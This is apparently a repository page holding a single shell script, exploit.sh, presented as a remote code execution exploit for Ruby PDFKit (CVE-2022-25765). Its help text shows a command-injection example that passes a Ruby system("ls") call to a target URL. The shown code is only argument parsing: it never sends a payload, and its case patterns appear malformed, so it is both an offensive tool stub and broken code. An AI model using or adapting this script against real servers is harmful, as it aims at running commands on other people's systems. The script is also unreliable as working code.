STRLCPY/CVE-2022-25765-pdfkit

Total 1 files

■ ■ ■ ■ ■ ■

exploit.sh

1	+	#!/bin/bash
2	+	# Exploit Title: Ruby PDFKit exploit
3	+	# Description: An exploitation of RCE in Ruby PDF kit (CVE-2022-25765)
4	+	# Date: 2022-11-29
5	+	# Exploit Author: @Atsukoro1
6	+
7	+	params=("url" "script")
8	+	url=""
9	+	script=""
10	+
11	+	if [ "$1" == "-h" ]; then
12	+	echo "Exploitation of RCE in Ruby PDF kit (CVE-2022-25765)"
13	+	echo "Usage: ./exploit.sh -u <url> -s <script>"
14	+	echo "Example: ./exploit.sh -u http://localhost:3000 -s 'system(\"ls\")'"
15	+	exit 0
16	+	fi
17	+
18	+	for arg in "$@"
19	+	do
20	+	case $arg in
21	+	-u=\|--url=)
22	+	url="${arg#*=}"
23	+	shift
24	+
25	+	;;
26	+	-s=\|--script=)
27	+	script="${arg#*=}"
28	+	shift
29	+
30	+	;;
31	+
32	+	*)
33	+	echo "${arg} is not a valid argument"
34	+	;;
35	+	esac
36	+	done